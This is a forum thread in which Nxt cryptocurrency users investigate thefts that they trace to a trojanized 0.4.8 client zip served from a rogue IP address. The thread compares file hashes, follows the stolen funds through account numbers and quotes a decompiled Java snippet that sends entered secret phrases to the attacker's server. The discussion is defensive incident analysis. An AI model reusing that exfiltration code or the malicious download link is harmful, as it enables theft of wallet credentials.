In summary,what I found from Chrome history: from download history, the malware link was: http://162.243.246.223/nxt-client-0.4.8.zipsha256: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 the creation time and modification time of the zip file on my local disk was: creation time:2013.12.31,20:31:14 modified time:2013.12.31,20:35:16 in that time period, I only accessed two pages: 20:29 https://bitcointalk.org/index.php?topic=345619.11740 20:30 https://bitcointalk.org/index.php?topic=345619.0 from the download history, I probably downloaded the malware from the first page,that is: http://info.nxtcrypto.org/nxt-client-0.4.8.zip(I found the new version and checked it on the first page, and it's true, there's an update there, but I don't like the mega site, its slow from my home, so I downloaded the link from the first page) the thief might changed the link directly, or he might changed IP address of info.nxtcrypto.org current IP of info.nxtcrypto.org is 46.28.204.121, which is different from 162.243.246.223the following are some clues about the accounts where my nxt goes: 2 of my accounts were stolen, one of them lost 18198 nxt, the nxt goes to an account which only has one transaction, the account is 9793828175536096502, the nxt is still in this account, I find nothing from this account. another account of mine, which had 93 nxt balance, was stolen to an account which have many transactions, I found sth from this account: 6164081464868000542, the first transaction to this account happened at 16 DEC, which refers to another acc:496131565008433801, in this account, there're 3 incoming transactions from acc:6635869272840226493, which I remember is the account of dgex, each withdraw at dgex are coming from this account(at least for me), so, if the thief is the owner of acc:6164081464868000542 and acc:496131565008433801, he probably has an id in dgex! this is only account with very weak password and people were 3x stealing Nxt from it probably http://87.230.14.1/nxt/nxt.cgi?action=3000&acc=496131565008433801(or 1x Nxt were only transfered to the 2nd account, where we can see many aliases: 14527793117125736279)
|
|
|
PaulyC: the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, the link was http://162.243.246.223/nxt-client-0.4.8.zipthis client is different from what I Just downloaded from this thread: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip please check your browser history to find which page you used for the download - where did you find a link? how to find it from Chrome? I just find the link, not the webpage the link was in, there should be some ways to find that! ctrl+h
|
|
|
PaulyC: the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, the link was http://162.243.246.223/nxt-client-0.4.8.zipthis client is different from what I Just downloaded from this thread: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip please check your browser history to find which page you used for the download - where did you find a link?
|
|
|
Interesting...: if (!paramString.equals("")) { if (!myKeys.contains(paramString)) { URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1")); URLConnection connection = url.openConnection(); connection.setConnectTimeout(10000); connection.getInputStream(); myKeys.add(paramString); } } epicdices.com is also hosted on 162.243.246.223 - coincidence? no, as I wrote here, we know identity of the hacker: 162.243.246.223 looks like it is "epicdices.com" ( http://domain-kb.com/www/epicdices.com) Owner of epicdices - EpicThomas - is a member of this topic: https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
|
|
|
We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
|
|
|
I literally saw my client a few moments after it happened (it was open) so how this happened is odd!
My actual User account that has been stolen from is NXT 16821029889165561706
I don't have any idea how this may have happened either. Just wanted to confirm, at the moment the theft happened your client was running and you had the browser window opened, and your account was unlocked (you were seeing your balance and the "send money" arrow), is that all correct? Just trying to differentiate the possibilities, whether the hacker obtained you password via brute-force or some other way and initiated the transaction from another machine, or somehow your own machine was tricked to initiate the transaction. And you were running 0.4.8 at the time, right? I added the second check for secret phrase before send money exactly to increase security, so that even if you account is unlocked in the browser you still need to enter your password again. Another question, did you generate your random-looking password using some software - password manager, online service, or created it manually by typing at random? I just wanted to clarify, with this, I had my server and client open. Was just perusing the blocks within the client, seeing if I was up-to-date, something I just do sometimes, and the account balance went from 7808, then on next look 0, maybe a moment later, less than 10 seconds. No one was remotely accessing my computer etc. It was just balance 0, account recipient ID under sent transactions with 7808, etc. Update ran a full scan with my antivirus software, ESET, all up to date, no viruses or intrusions found. The other question about password, this is the very first account I made so I did use the password generator that I had seen recommended on nextcoin.org used "local" mode, to a certain degree, http://passwordsgenerator.net/(i definitely wouldn't recommend using one of these) for 25 of the char of the PW, then I just made up the rest randomly 9 more characters. and I'm not sure about what online nodes refers to exactly, but I can honestly say I never used anything online with that PW until today with CfB. I don't see any strange opened ports so I believe I'm good on that end. Has anyone else noticed the 4.8 download zip from nextcoin.org vs. the one from this exact link Nxt 0.4.8 - https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI Are 5 Kb in difference? is that anything to be concerned about? I want to buy more NXT, but it just sucks cuz i got in somewhat early and thought I was following all the instructions correctly, and I honestly don't know what happened which makes me hesitant. It's not cool everyone thinks I'm some troll planning this all out, but I guess that's a natural reaction. I would hope in the future there's someway to stop someone from just taking someone's NXT like this, (I actually thought the two step PW on "sending" was a good idea, but didn't stop them in this case) I'll try to keep an eye out on this hacker's acct# to see if he hits anybody else. http://22k.io/-account/16204974692852323982Looks like you downloaded a bogus client. Scary stuff. The client at the front page of this thread is legit. You need to calculate the hash256 of the zip file of your client and compare to the hash in the 0.4.8 in the front page. They have to match exactly. As you said you have two same client with 5Kb difference in size. One is certainly bogus. Sorry for your loss. This should really be sticky. I could have fallen for this since I never checked the file until today. But for now, only use client file from trusted source and do a checksum hash256 the zip file before using. This needs to be in wiki and the front page. everyone can edit wiki......
|
|
|
KNFHVVWfvrLvz3Sx9mBdUB2k1hsK7BC186
|
|
|
Hey, looks like I just got robbed, too. Someone please check this account: 12152013998194592943 They now have 147k+ from me. Had a 40 char random password, capital, lower, numbers, symbols. WTF?
you're 11794318797680953099? http://22k.io/-account/12152013998194592943
|
|
|
I can see those talkshows right now "So if I type "Barbara" as my password, some hacker will steal my money?" "It would take some time, maybe 5 seconds, but yes, you will loose all your funds." "..."
|
|
|
Just few things i don't understand... it was said everyone with > 50khs will be kicked from the pool
1) it's meant 50khs in total or per worker? 2) and if i mine in solo using a GPU? how can you limit that?
Thanks to anyone who can clarify that...
... and Happy New Year!
The 50kh,s pool is a special pool that is for cpu,s only * we give the cpu miners there some extra coins every day * All other pools and solo mining are not limited in any way NYAN! so can people mine with normal notebooks without any special cards?
|
|
|
I finally published my blog post about Alias goldrush on 22nd December (how I spent 7 hours by registering 740 aliases ): http://nxtcoin.blogspot.com/- there are some personal thoughts and also some statistics
|
|
|
so the competition is over?
|
|
|
|